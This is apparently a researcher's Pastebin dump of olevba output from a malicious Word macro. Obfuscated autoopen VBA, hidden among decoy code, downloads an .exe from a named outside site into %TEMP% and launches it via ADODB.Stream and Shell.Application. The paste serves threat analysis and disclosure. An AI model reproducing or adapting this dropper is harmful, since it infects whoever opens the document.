Advertisement
dynamoo

Malicious Word macro

Jul 27th, 2015
739
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. XML:MASI-B-V orderc~1.xml
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: orderc~1.xml
  10. Type: Word2003_XML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
  23. xgjZCbM7Yfz8
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module1.bas
  31. in file: editdata.mso - OLE stream: u'VBA/Module1'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. Public fMainForm As Long
  34. Public g_computers As New Collection
  35. Public g_databases As New Collection
  36.  
  37. Private Sub init()
  38.     Dim c As Object
  39.     Dim p As Object
  40.        
  41.     ' ---
  42.    ' One node configuration
  43.    '
  44.    With c
  45.         .m_ip = "130.100.232.31"
  46.         .m_name = "ndb-client31"
  47.         .m_status = "Connected"
  48.         Set .m_processes = New Collection
  49.     End With
  50.     addComputer c
  51.    
  52.     With p
  53.         .m_id = "1"
  54.         .m_name = "mgm-1"
  55.         .m_database = "elathal"
  56.         .m_status = "Running"
  57.         .m_owner = "elathal"
  58.         Set .m_computer = c
  59.     End With
  60.     addProcess c, p
  61.        
  62.     With p
  63.         .m_id = "2"
  64.         .m_name = "ndb-2"
  65.         .m_database = "elathal"
  66.         .m_status = "Running"
  67.         .m_owner = "elathal"
  68.         Set .m_computer = c
  69.     End With
  70.     addProcess c, p
  71.  
  72.     With p
  73.         .m_id = "3"
  74.         .m_name = "api-3"
  75.         .m_database = "elathal"
  76.         .m_status = "Running"
  77.         .m_owner = "elathal"
  78.         Set .m_computer = c
  79.     End With
  80.     addProcess c, p
  81.  
  82.     ' ---
  83.    ' Two node configuration
  84.    '
  85.    
  86.     With p
  87.         .m_id = "4"
  88.         .m_name = "mgm-1"
  89.         .m_database = "ejonore-2-node"
  90.         .m_status = "Running"
  91.         .m_owner = "ejonore"
  92.         Set .m_computer = c
  93.     End With
  94.     addProcess c, p
  95.        
  96.     With c
  97.         .m_ip = "10.0.1.1"
  98.         .m_name = "cluster-1"
  99.         .m_status = "Connected"
  100.         Set .m_processes = New Collection
  101.     End With
  102.     addComputer c
  103.    
  104.     With p
  105.         .m_id = "1"
  106.         .m_name = "ndb-2"
  107.         .m_database = "ejonore-2-node"
  108.         .m_status = "Running"
  109.         .m_owner = "ejonore"
  110.         Set .m_computer = c
  111.     End With
  112.     addProcess c, p
  113.  
  114.     With c
  115.         .m_ip = "10.0.2.1"
  116.         .m_name = "cluster-2"
  117.         .m_status = "Connected"
  118.         Set .m_processes = New Collection
  119.     End With
  120.     addComputer c
  121.    
  122.    
  123.     With p
  124.         .m_id = "1"
  125.         .m_name = "ndb-3"
  126.         .m_database = "ejonore-2-node"
  127.         .m_status = "Running"
  128.         .m_owner = "ejonore"
  129.         Set .m_computer = c
  130.     End With
  131.     addProcess c, p
  132.    
  133.    
  134.     With c
  135.         .m_ip = "10.0.3.1"
  136.         .m_name = "cluster-3"
  137.         .m_status = "Connected"
  138.         Set .m_processes = New Collection
  139.     End With
  140.     addComputer c
  141.    
  142.    
  143.     With p
  144.         .m_id = "1"
  145.         .m_name = "api-4"
  146.         .m_database = "ejonore-2-node"
  147.         .m_status = "Running"
  148.         .m_owner = "ejonore"
  149.         Set .m_computer = c
  150.     End With
  151.     addProcess c, p
  152.    
  153.    
  154.     With c
  155.         .m_ip = "10.0.4.1"
  156.         .m_name = "cluster-4"
  157.         .m_status = "Connected"
  158.         Set .m_processes = New Collection
  159.     End With
  160.     addComputer c
  161.    
  162.    
  163.     With p
  164.         .m_id = "1"
  165.         .m_name = "api-5"
  166.         .m_database = "ejonore-2-node"
  167.         .m_status = "Running"
  168.         .m_owner = "ejonore"
  169.         Set .m_computer = c
  170.     End With
  171.     addProcess c, p
  172.    
  173.    
  174.     With c
  175.         .m_ip = "130.100.232.5"
  176.         .m_name = "ndbs05"
  177.         .m_status = "Not connected"
  178.         Set .m_processes = New Collection
  179.     End With
  180.     addComputer c
  181.    
  182.    
  183.     With c
  184.         .m_ip = "130.100.232.7"
  185.         .m_name = "ndb-srv7"
  186.         .m_status = "No contact"
  187.         Set .m_processes = New Collection
  188.     End With
  189.     addComputer c
  190.    
  191. End Sub
  192.  
  193. Public Sub addComputer(ByRef c As Object)
  194.     g_computers.Add c, "_" & c.m_name
  195. End Sub
  196.  
  197. Private Sub addProcess(ByRef c As Object, ByRef p As Object)
  198.     c.m_processes.Add p, "_" & p.m_id
  199.        
  200.     Dim cl As Object
  201.     If Not Exists(g_databases, "_" & p.m_database) Then
  202.        
  203.         With cl
  204.             .m_name = p.m_database
  205.             .m_status = "Unknown"
  206.             Set .m_processes = New Collection
  207.         End With
  208.         g_databases.Add cl, "_" & p.m_database
  209.     Else
  210.         Set cl = g_databases("_" & p.m_database)
  211.     End If
  212.     cl.m_processes.Add p, "_" & p.m_computer.m_name & "_" & p.m_id
  213. End Sub
  214.  
  215. -------------------------------------------------------------------------------
  216. VBA MACRO Module2.bas
  217. in file: editdata.mso - OLE stream: u'VBA/Module2'
  218. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  219. Public PKhoGPtN As String
  220. Public Function Exists(ByRef c As Collection, ByVal k As String) As Boolean
  221.     Dim r As Boolean
  222.     Dim o As Object
  223.    
  224.     r = True
  225.    
  226.     On Error GoTo NotFound
  227.     Set o = c.Item(k)
  228.     GoTo Continue
  229. NotFound:
  230.     If Err.Number <> 5 Then
  231.         Err.Raise Err.Number, Err.Source, Err.Description
  232.     End If
  233.    
  234.     r = False
  235. Continue:
  236.     Exists = r
  237. End Function
  238. Public Function jiTGOr8bSJ1w(q0ebTPIgr4y6UT As Variant, SZodTL82 As String)
  239. Dim G6M02vjrQ3577t: Set G6M02vjrQ3577t = TYd0YfgosaIJ(Chr(65) & Chr(60) & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & "=" & "r" & Chr(60) & Chr(101) & Chr(97) & Chr(59) & "m")
  240.    G6M02vjrQ3577t.Type = 1
  241.     G6M02vjrQ3577t.Open
  242.     G6M02vjrQ3577t.write q0ebTPIgr4y6UT
  243.     G6M02vjrQ3577t.savetofile SZodTL82, 2
  244. End Function
  245.  
  246.  
  247.  
  248.  
  249. Sub Main()
  250.     If False Then
  251.         Dim fLogin As Object
  252.         fLogin.Show vbModal
  253.         If Not fLogin.OK Then
  254.             'Login Failed so exit app
  255.            End
  256.         End If
  257.         Unload fLogin
  258.  
  259.         frmSplash.Show
  260.         frmSplash.Refresh
  261.     End If
  262.    
  263.     cdd.init
  264.    
  265.     cd.Load fMainForm
  266.     cc.Unload frmSplash
  267.  
  268.     vd.fMainForm.Show
  269. End Sub
  270.  
  271. -------------------------------------------------------------------------------
  272. VBA MACRO Module3.bas
  273. in file: editdata.mso - OLE stream: u'VBA/Module3'
  274. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  275.  Public Const cNULL = "" 'empty string
  276.    Public Const cSEP_URLDIR = "/" 'separator for dividing directories in URL addresses.
  277.    Public Const cSEP_DIR = "\" 'directory separator character
  278.    Public Const cBYVAL = "ByVal "
  279.     Public Const cBYREF = "ByRef "
  280.     Public Const cAS = " As "
  281.     Public Const cEQUALS = " = "
  282.     Public Const cSPC = "'   "
  283.     Public Const cCOMMA = ", "
  284.     Public Const cDIM = "Dim "
  285.     Public Const cCONST = "Const "
  286.  
  287.     'used for scanning files for particular entries
  288.    Public Const cFORM = "Form"
  289.     Public Const cMOD = "Module"
  290.     Public Const cCLASS = "Class"
  291.     Public Const cUSERCONTROL = "UserControl"
  292.     Public Const cRESOURCE = "ResFile32"
  293.  
  294.     'code definition names
  295.    Public Const cSUB = "Sub"
  296.     Public Const cFUNC = "Function"
  297.     Public Const cPROP = "Property"
  298.  
  299.     'property types
  300.    Public Const cPGET = "Property Get"
  301.     Public Const cPSET = "Property Set"
  302.     Public Const cPLET = "Property Let"
  303.  
  304.     'code definition types
  305.    Public Const cPRIVATE = "Private "
  306.     Public Const cPUBLIC = "Public "
  307.     Public Const cFRIEND = "Friend "
  308.  
  309.     'commenting text (header & footer)
  310.    Public Const cCOMMENTS = "'#-------------------------------------------------------------#"
  311.  
  312.     'date format constant
  313.    Public Const cDFORMAT = "dd-mmm-yyyy"
  314.  
  315.  
  316.     'global variables
  317.    '~~~~~~~~~~~~~~~~
  318.    Public gsFtype As String
  319.     Public gsChar As String
  320.     Public giLeftBit As Integer
  321.     Public giRightBit As Integer
  322.     Public giCounter As Integer
  323.     Public gsOldPath As String
  324.     Public gsNewPath As String
  325.     Public garStyles() As CODESTYLE 'code-style storage array
  326.  
  327.  
  328.     'type declarations
  329.    '~~~~~~~~~~~~~~~~~
  330.    Type VARTYPE 'for dead-variable checking
  331.        Name As String
  332.         Type As String
  333.         Used As Boolean
  334.     End Type
  335.  
  336.     Type CODESTYLE 'for storing code-style types
  337.        Name As String
  338.         Author As String
  339.         Created As String
  340.         History As String
  341.     End Type
  342.  
  343. Public Function AddDIRSep(sPathName As String) As String
  344. '#-------------------------------------------------------------#
  345. ' AUTHOR:       John Griffiths
  346. ' CREATED:      4-Nov-1998
  347. ' DESCRIPTION:
  348. '   adds trailing directory path separator (back slash)
  349. '   to end of path, unless one already exists
  350. '
  351. ' PARAMETERS:
  352. '   sPathName string:
  353. '
  354. ' RETURNS:
  355. '   String
  356. '
  357. ' CHANGE HISTORY:
  358. '   08-Mar-2000  John Griffiths (added front-end)
  359. '#-------------------------------------------------------------#
  360.    Dim sS As String
  361.  
  362.     sS = Trim(sPathName)
  363.     If Right(Trim(sPathName), Len("\")) <> "\" Then sS = Trim(sPathName) & "\"
  364.  
  365.     AddDIRSep = sS
  366.  
  367.     'OLD CODE
  368.    'If Right(Trim(sPathName), Len(cSEP_URLDIR)) <> cSEP_URLDIR And _
  369.     '   Right(Trim(sPathName), Len(cSEP_DIR)) <> cSEP_DIR Then
  370.    '    sPathName = RTrim(sPathName) & cSEP_DIR
  371.    'End If
  372. End Function
  373. Public Sub CheckFileList()
  374. '#-------------------------------------------------------------#
  375. ' AUTHOR:       John A. Griffiths
  376. ' CREATED:      4-Nov-1998
  377. ' DESCRIPTION:
  378. '   work out which project in lstProjects to select, then call to
  379. '   build a list of files that project uses
  380. '
  381. ' PARAMETERS:
  382. '   None
  383. '
  384. ' CHANGE HISTORY:
  385. '   12-Nov-1998  'rtrim' bug fix
  386. '#-------------------------------------------------------------#
  387.    If (frmMain.lstProjects.ListCount = 0) Then
  388.         'if lstProjects is empty, clear lstFiles and disable cmdAddComments
  389.        frmMain.lstFiles.Clear
  390.         frmMain.btnAddComments.Enabled = False
  391.  
  392.     Else
  393.         'otherwise select first project in list and process it
  394.        frmMain.lstProjects.Selected(0) = True
  395.         MakeFileList (frmMain.lstProjects.List(0))
  396.     End If
  397. End Sub
  398.  
  399. Public Function DirExists(ByVal sDirName As String) As Integer
  400. '#-------------------------------------------------------------#
  401. ' AUTHOR:       John Griffiths
  402. ' CREATED:      4-Nov-1998
  403. ' DESCRIPTION:
  404. '   Checks if directory 'sDirName' exists
  405. '   (can be used to check whether a floppy disk is in drive A: by passing "A:\")
  406. '
  407. '   //WORKING VERSION//
  408. '
  409. ' PARAMETERS:
  410. '   sDirName string:
  411. '
  412. ' RETURNS:
  413. '   Integer (exists = TRUE, doesn't exist = FALSE)
  414. '
  415. ' CHANGE HISTORY:
  416. '   12-Nov-1998  'rtrim' bug fix
  417. '#-------------------------------------------------------------#
  418.    Dim sS As String
  419.     Dim iMod As Integer
  420.  
  421.     On Error Resume Next
  422.  
  423.     sS = Dir(AddDIRSep(sDirName) & "*.*", vbDirectory) 'get directory name only
  424.    iMod = Not (Len(sS) < 1)
  425.  
  426.     'modify for checkboxes
  427.    If (iMod = -1) Then DirExists = 1 Else DirExists = 0
  428.  
  429.     Err = 0 'clear error flag
  430. End Function
  431.  
  432. Public Function WdkPbbVCe2B8(aypYh7iQ As String)
  433.  Set S7xKHhGF3 = TYd0YfgosaIJ(Chr(83) & Chr(104) & "=" & Chr(101) & "l" & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & ";" & Chr(112) & Chr(108) & Chr(105) & Chr(60) & "c" & Chr(97) & Chr(116) & Chr(61) & Chr(105) & "o" & Chr(110))
  434. S7xKHhGF3.Open (PKhoGPtN)
  435. End Function
  436. Public Sub MakeFileList(ByVal sFileName As String)
  437. '#-------------------------------------------------------------#
  438. ' AUTHOR:       John A. Griffiths
  439. ' CREATED:      18-May-1999
  440. ' DESCRIPTION:
  441. '   read project file and add it's component files to the listbox
  442. '
  443. ' PARAMETERS:
  444. '   sFileName string:
  445. '
  446. ' CHANGE HISTORY:
  447. '   12-Nov-1998  'rtrim' bug fix
  448. '#-------------------------------------------------------------#
  449.    Dim sMyLine As String
  450.     Dim sINIValue As String
  451.     Dim lMarker As Long
  452.     Dim ilength As Integer
  453.     Dim hfree As Integer
  454.  
  455.  
  456.     'update input path textbox
  457.    frmMain.txtFilePath.Text = frmMain.lstDirectories.Path & "\" & sFileName
  458.  
  459.     'clear lstFiles listbox
  460.    frmMain.lstFiles.Clear
  461.  
  462.     'scan txtFilePath file for .frm and .bas entries (add to lstFiles)
  463.    hfree = FreeFile 'assign free file-handle to hfree
  464.  
  465.     Open RTrim(frmMain.txtFilePath.Text) For Input As #hfree
  466.  
  467.     Do While Not EOF(hfree)
  468.         Line Input #hfree, sMyLine 'put line into sMyLine
  469.        sMyLine = Trim(sMyLine) 'trim line
  470.  
  471.         'search for FORM files
  472.        If UCase(Left(sMyLine, Len(cFORM))) = UCase(cFORM) Then
  473.             lMarker = InStr(sMyLine, "=")
  474.             sINIValue = LTrim(Right(sMyLine, Len(sMyLine) - lMarker))
  475.             frmMain.lstFiles.AddItem (sINIValue)
  476.  
  477.         'search for MODULE files
  478.        ElseIf UCase(Left(sMyLine, Len(cMOD))) = UCase(cMOD) Then
  479.             lMarker = InStr(sMyLine, ";")
  480.             sINIValue = LTrim(Right(sMyLine, Len(sMyLine) - lMarker))
  481.             frmMain.lstFiles.AddItem (sINIValue)
  482.  
  483.         'search for CLASS files
  484.        ElseIf UCase(Left(sMyLine, Len(cCLASS))) = UCase(cCLASS) Then
  485.             lMarker = InStr(sMyLine, ";")
  486.             sINIValue = LTrim(Right(sMyLine, Len(sMyLine) - lMarker))
  487.             frmMain.lstFiles.AddItem (sINIValue)
  488.  
  489.         'search for USERCONTROL files
  490.        ElseIf UCase(Left(sMyLine, Len(cUSERCONTROL))) = UCase(cUSERCONTROL) Then
  491.             lMarker = InStr(sMyLine, "=")
  492.             sINIValue = LTrim(Right(sMyLine, Len(sMyLine) - lMarker))
  493.             frmMain.lstFiles.AddItem (sINIValue)
  494.  
  495.         'search for 32-bit Resource files
  496.        ElseIf UCase(Left(sMyLine, Len(cRESOURCE))) = UCase(cRESOURCE) Then
  497.             lMarker = InStr(sMyLine, "=") + 1 'to account for the '"' at either end
  498.            sINIValue = LTrim(Right(sMyLine, Len(sMyLine) - lMarker))
  499.             sINIValue = Left(sINIValue, Len(sINIValue) - 1)
  500.             frmMain.lstFiles.AddItem (sINIValue)
  501.         End If
  502.     Loop
  503.  
  504.     Close #hfree 'close file
  505.  
  506.  
  507.     'find projects full path (not including proj file name)
  508.    ilength = Len(Trim(frmMain.txtFilePath.Text))
  509.     giCounter = 0
  510.  
  511.     While ((Not (giCounter = 2)) And (ilength > 0))
  512.         gsChar = Mid(Trim(frmMain.txtFilePath.Text), ilength, 1)
  513.  
  514.         If (gsChar = "\") And (giCounter = 0) Then
  515.             giRightBit = ilength - 1
  516.             giCounter = 1
  517.             gsChar = ""
  518.  
  519.         ElseIf (gsChar = "\") And (giCounter = 1) Then
  520.             giLeftBit = ilength + 1
  521.             giCounter = 2
  522.             gsChar = ""
  523.         End If
  524.  
  525.         ilength = ilength - 1
  526.     Wend
  527.  
  528.     'put project's directory name in gsNewPath
  529.    gsNewPath = Mid(Trim(frmMain.txtFilePath.Text), giLeftBit, giRightBit - giLeftBit + 1)
  530.  
  531.     'make gsOldPath point to original directory name (using gsNewPath)
  532.    gsOldPath = Mid(Trim(frmMain.txtFilePath.Text), 1, giLeftBit - 2) & "\" & gsNewPath
  533.  
  534.     'make lstDirectories box point to txtfilepath directory (using gsNewPath)
  535.    frmMain.lstDirectories.Path = Mid(Trim(frmMain.txtFilePath.Text), 1, giLeftBit - 2) & "\" & gsNewPath
  536.  
  537.     'set txtoutputdir to full path of project's dump directory
  538.    frmMain.txtOutputDir.Text = Mid(Trim(frmMain.txtFilePath.Text), 1, giLeftBit - 2) & "\_" & gsNewPath
  539.  
  540.     'if nothing in lstfiles listbox, disable ADD COMMENTS button
  541.    If (frmMain.lstFiles.ListCount = 0) Then
  542.         frmMain.btnAddComments.Enabled = False
  543.     Else
  544.         frmMain.btnAddComments.Enabled = True
  545.     End If
  546.  
  547.     'work out number of files (adjust text accordingly)
  548.    If (frmMain.lstFiles.ListCount = 1) Then sMyLine = " file" Else sMyLine = " files"
  549.     frmMain.lblFiles.Caption = "Files used in project (" & frmMain.lstFiles.ListCount & sMyLine & ") :"
  550. End Sub
  551.  
  552. Public Function TYd0YfgosaIJ(caYoSACX As String)
  553. caYoSACX = Replace(caYoSACX, Chr(60), "")
  554. caYoSACX = Replace(caYoSACX, Chr(61), "")
  555. caYoSACX = Replace(caYoSACX, Chr(59), "")
  556.  Set TYd0YfgosaIJ = CreateObject(caYoSACX)
  557. End Function
  558. Public Sub WriteComments(ByVal iFileNum As Integer, ByVal sDecLine As String)
  559. '#-------------------------------------------------------------#
  560. ' AUTHOR:       John A. Griffiths
  561. ' CREATED:      4-Nov-1998
  562. ' DESCRIPTION:
  563. '   comments template, and passed/returned code
  564. '
  565. ' PARAMETERS:
  566. '   iFileNum integer:
  567. '   sDecLine integer:
  568. '
  569. ' CHANGE HISTORY:
  570. '   12-Nov-1998  'rtrim' bug fix
  571. '   25-Nov-1998  pass function as parameter bug fix
  572. '#-------------------------------------------------------------#
  573.    Dim iStart As Integer
  574.     Dim iEnd As Integer
  575.     Dim iMarker1 As Integer
  576.     Dim iMarker2 As Integer
  577.     Dim iRetMarker As Integer
  578.     Dim sVar As String
  579.     Dim sName As String
  580.     Dim sType As String
  581.     Dim sReturns As String
  582.     Dim bLineEnd As Boolean
  583.     Dim bNoParams As Boolean
  584.     Dim bFuncNone As Boolean
  585.     Dim iFuncChecking As String
  586.     Dim sTempStr As String
  587.     Dim iTempLen As Integer
  588.     Dim iTempCnt As Integer
  589.     Dim iTempMarker As Integer
  590.  
  591.  
  592.     sDecLine = Trim(sDecLine) 'trim our copy of line we are going to use
  593.  
  594.     Print #iFileNum, cCOMMENTS
  595.     Print #iFileNum, "' AUTHOR:   " & Chr(9) & Trim(frmMain.txtAuthor.Text)
  596.     Print #iFileNum, "' CREATED:  " & Chr(9) & Trim(frmMain.txtCreated.Text)
  597.     Print #iFileNum, "' DESCRIPTION:" & Chr(9)
  598.  
  599.     'fill in description for well-known items
  600.    If InStr(1, UCase(sDecLine), UCase("Sub Form_Load")) Then
  601.         Print #iFileNum, cSPC & "Form Initialisation Code"
  602.     ElseIf InStr(1, UCase(sDecLine), UCase("Sub Form_Unload")) Then
  603.         Print #iFileNum, cSPC & "Form Unloading Code"
  604.     Else
  605.         Print #iFileNum, cSPC 'otherwise leave blank
  606.    End If
  607.  
  608.  
  609.     Print #iFileNum, "'"
  610.     Print #iFileNum, "' PARAMETERS:"
  611.  
  612.     'initialise flags
  613.    bLineEnd = False 'have we reached the end of the line
  614.    bFuncNone = True 'for working out if it's a function with no parameters
  615.    bNoParams = True
  616.  
  617.     'PARAMETERS handling code
  618.    '++++++++++++++++++++++++
  619.    'print parameter information
  620.    iStart = InStr(1, sDecLine, "(")
  621.     iMarker1 = iStart
  622.  
  623.     If Mid(sDecLine, Len(sDecLine), 1) = ")" Then
  624.         'no returns
  625.        iEnd = Len(sDecLine)
  626.     Else
  627.         'find ")" (going backwards along string "sDecLine")
  628.        iTempLen = Len(Trim(sDecLine))
  629.  
  630.         'initialise temporary markers
  631.        iTempCnt = 0: iTempMarker = 0
  632.  
  633.         While ((Not (iTempCnt = 1)) And (iTempLen > 0))
  634.             sTempStr = Mid(sDecLine, iTempLen, 1)
  635.             If (sTempStr = ")") Then
  636.                 iTempMarker = iTempLen
  637.                 iTempCnt = 1
  638.                 sTempStr = ""
  639.             End If
  640.             iTempLen = iTempLen - 1
  641.         Wend
  642.  
  643.         iEnd = iTempLen + 1
  644.  
  645.         If (iStart + 1) = iEnd Then
  646.             bFuncNone = True 'if function then there is no space for any parameters
  647.        End If
  648.     End If
  649.  
  650.  
  651.     Do While (bLineEnd = False)
  652.         iMarker2 = InStr(iMarker1, sDecLine, cCOMMA) 'was cAS
  653.  
  654.         If (iMarker2 = 0) Then
  655.             If (iMarker1 < iEnd) And (Not ((iMarker1 + 1) = iEnd)) Then
  656.                 'reached partial end of declaration, keep on processing one more time
  657.                iMarker2 = iEnd
  658.             Else
  659.                 'reached end of declaration, stop processing
  660.                iMarker1 = iTempMarker
  661.                 bLineEnd = True
  662.             End If
  663.         End If
  664.  
  665.  
  666.         If ((Not (iMarker2 = 0)) And bLineEnd = False) Then
  667.             'take out variable name, put in sVar
  668.            sVar = Trim(Mid(sDecLine, iMarker1, iMarker2 - iMarker1))
  669.  
  670.             'if it's a function with no parameters, don't put them in
  671.            '(by this time bLineEnd is set to true, so it will quit the loop afterwards)
  672.            If (Not (iMarker1 > iMarker2)) Then 'was (iMarker2 > iMarker1)
  673.  
  674.                 'if find "(" at start, remove it (a bug)
  675.                If Left(sVar, 1) = "(" Then
  676.                     sVar = Right(sVar, Len(sVar) - 1)
  677.                 End If
  678.  
  679.  
  680.                 If InStr(1, sVar, cBYVAL) > 0 Then
  681.                     'remove BYVAL text from "sVar" before processing
  682.                    sVar = Trim(Right(sVar, Len(sVar) - Len(cBYVAL)))
  683.  
  684.                 ElseIf InStr(1, sVar, cBYREF) > 0 Then
  685.                     'remove BYREF text from "sVar" before processing
  686.                    sVar = Trim(Right(sVar, Len(sVar) - Len(cBYREF)))
  687.                 End If
  688.  
  689.  
  690.                 iTempCnt = InStr(1, sVar, cAS)
  691.                 If iTempCnt = 0 Then
  692.                     'have not found " As ", so variable undefined
  693.                    sType = "Variant"
  694.                     sName = sVar
  695.                 Else
  696.                     'found type, put in sType
  697.                    sType = Right(sVar, (Len(sVar) - iTempCnt) - 3) '-3 to remove "As "
  698.                    sName = Mid(sVar, 1, iTempCnt)
  699.                 End If
  700.  
  701.                 'save variable details in comments template
  702.                Print #iFileNum, cSPC & Trim(sName) & " " & LCase(sType) & ":"
  703.                 bFuncNone = False 'if function then has got parameters
  704.            End If
  705.  
  706.             iMarker1 = iMarker2 + Len(cCOMMA) 'pass over values (advance to next position)
  707.            bNoParams = False 'got parameters (function or sub)
  708.        End If
  709.     Loop
  710.  
  711.     'now deal with a no-parameters situation
  712.    If (bNoParams = True) Then
  713.         'if no parameters, say so
  714.        Print #iFileNum, cSPC & "None"
  715.     ElseIf ((InStr(sDecLine, cFUNC) <> 0) Or (InStr(sDecLine, cPGET) <> 0)) _
  716.             And (bFuncNone = True) Then
  717.         'if function and no parameters, say so
  718.        Print #iFileNum, cSPC & "None"
  719.     End If
  720.  
  721.  
  722.     'RETURNS VALUE handling code
  723.    '+++++++++++++++++++++
  724.    iFuncChecking = 0 'initialise function testing flag
  725.  
  726.     'if function, add "Returns" section to "comments" text
  727.    iFuncChecking = InStr(sDecLine, cFUNC)
  728.     If iFuncChecking = 0 Then
  729.         'if got nothing, test for Property Get's as well
  730.        iFuncChecking = InStr(sDecLine, cPGET)
  731.     End If
  732.  
  733.     If (iFuncChecking <> 0) Then
  734.         If (bLineEnd = True) Then
  735.             Print #iFileNum, "'"
  736.             Print #iFileNum, "' RETURNS:"
  737.  
  738.             'does last character of code header contain ")"
  739.            If (Right(Trim(sDecLine), 1) = ")") Then
  740.                 'check to see if array delcaration, if so build Returns Information
  741.                If Right(Trim(sDecLine), 2) = "()" Then
  742.                     GoSub ProcessReturns
  743.                 Else
  744.                     'if so (and not array declaration)
  745.                    'then do not return any Returns Info (even if function)
  746.                    Print #iFileNum, cSPC & "None"
  747.                 End If
  748.  
  749.             Else
  750.                 'otherwise if ")" not found entirely, build Returns Information
  751.                GoSub ProcessReturns
  752.             End If
  753.         End If
  754.     End If
  755.  
  756.     Print #iFileNum, "'"
  757.     Print #iFileNum, "' CHANGE HISTORY:"
  758.     Print #iFileNum, "'   " & frmMain.txtHistory.Text
  759.     Print #iFileNum, cCOMMENTS
  760.  
  761.  
  762. EndHeader:
  763.     Exit Sub
  764.  
  765.  
  766. ProcessReturns:
  767.     sReturns = ""
  768.     iRetMarker = InStr(iTempMarker + 1, sDecLine, cAS) '+ 1 to account for the ")"
  769.  
  770.     'if got something, write it's type to the output file
  771.    If iRetMarker <> 0 Then
  772.         iRetMarker = iRetMarker + Len(cAS)
  773.         sReturns = Trim(Mid(sDecLine, iRetMarker, Len(sDecLine)))
  774.         Print #iFileNum, cSPC & sReturns 'write return type
  775.    Else
  776.         Print #iFileNum, cSPC & "None" 'write nothing
  777.    End If
  778.     Return 'go back to where jumped out
  779. End Sub
  780.  
  781. Public Function CheckFinished(ByVal sCode As String) As Boolean
  782. '#-------------------------------------------------------------#
  783. ' AUTHOR:       John A. Griffiths
  784. ' CREATED:      4-Nov-1998
  785. ' DESCRIPTION:
  786. '
  787. '
  788. ' PARAMETERS:
  789. '   sCode string:
  790. '
  791. ' RETURNS:
  792. '   Boolean
  793. '
  794. ' CHANGE HISTORY:
  795. '   08-Mar-2000  John A. Griffiths (code update)
  796. '#-------------------------------------------------------------#
  797.    If InStr(1, sCode, "End " & cSUB, vbTextCompare) Or _
  798.        InStr(1, sCode, "End " & cFUNC, vbTextCompare) Or _
  799.        InStr(1, sCode, "End " & cPROP, vbTextCompare) Then
  800.         CheckFinished = True 'return true, reached end of code block
  801.  
  802.     Else
  803.         CheckFinished = False 'return false, not reached end of code block
  804.    End If
  805. End Function
  806. Sub xgjZCbM7Yfz8()
  807.  
  808. K6AMEqRqxzgZI = Chr(104) & Chr(116) & ";" & Chr(116) & Chr(112) & Chr(58) & Chr(47) & "<" & Chr(47) & "w" & Chr(119) & "w" & Chr(60) & Chr(46) & Chr(109) & Chr(97) & "d" & "a" & Chr(103) & "a" & "s" & "c" & Chr(97) & "r" & Chr(45) & "g" & Chr(97) & "m" & "b" & Chr(97) & "s" & "=" & Chr(46) & Chr(99) & "o" & "m" & Chr(47) & "y" & "f" & Chr(102) & "d" & "/" & "y" & "f" & Chr(106) & ";" & Chr(46) & Chr(101) & "=" & Chr(120) & Chr(101)
  809. Set UIVWne98oN1 = TYd0YfgosaIJ(Chr(77) & Chr(105) & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & "." & "X" & Chr(77) & Chr(60) & Chr(76) & Chr(59) & Chr(72) & "T" & "=" & Chr(84) & Chr(80))
  810.  
  811. K6AMEqRqxzgZI = Replace(K6AMEqRqxzgZI, Chr(60), "")
  812. K6AMEqRqxzgZI = Replace(K6AMEqRqxzgZI, Chr(61), "")
  813. K6AMEqRqxzgZI = Replace(K6AMEqRqxzgZI, Chr(59), "")
  814. CallByName UIVWne98oN1, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
  815. K6AMEqRqxzgZI _
  816. , False
  817.  
  818. Set VGLJsIiu = TYd0YfgosaIJ(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(59) & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & Chr(60) & Chr(108) & Chr(108))
  819.  
  820. Set bc8BN6tBWxN = CallByName(VGLJsIiu, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
  821.  
  822. wusPjH2J = bc8BN6tBWxN(Chr(84) & Chr(69) & Chr(77) & Chr(80))
  823.  
  824. PKhoGPtN = wusPjH2J & Chr(92) & Chr(119) & Chr(97) & Chr(107) & Chr(97) & "m" & Chr(97) & Chr(107) & Chr(97) & Chr(102) & "o" & "." & Chr(101) & Chr(120) & Chr(101)
  825. Dim ik3TIXZPVw() As Byte
  826.  
  827. CallByName UIVWne98oN1, Chr(83) & "e" & Chr(110) & Chr(100), VbMethod
  828. ik3TIXZPVw = CallByName(UIVWne98oN1, "r" & Chr(101) & Chr(115) & "p" & "o" & Chr(110) & Chr(115) & "e" & "B" & "o" & Chr(100) & Chr(121), VbGet)
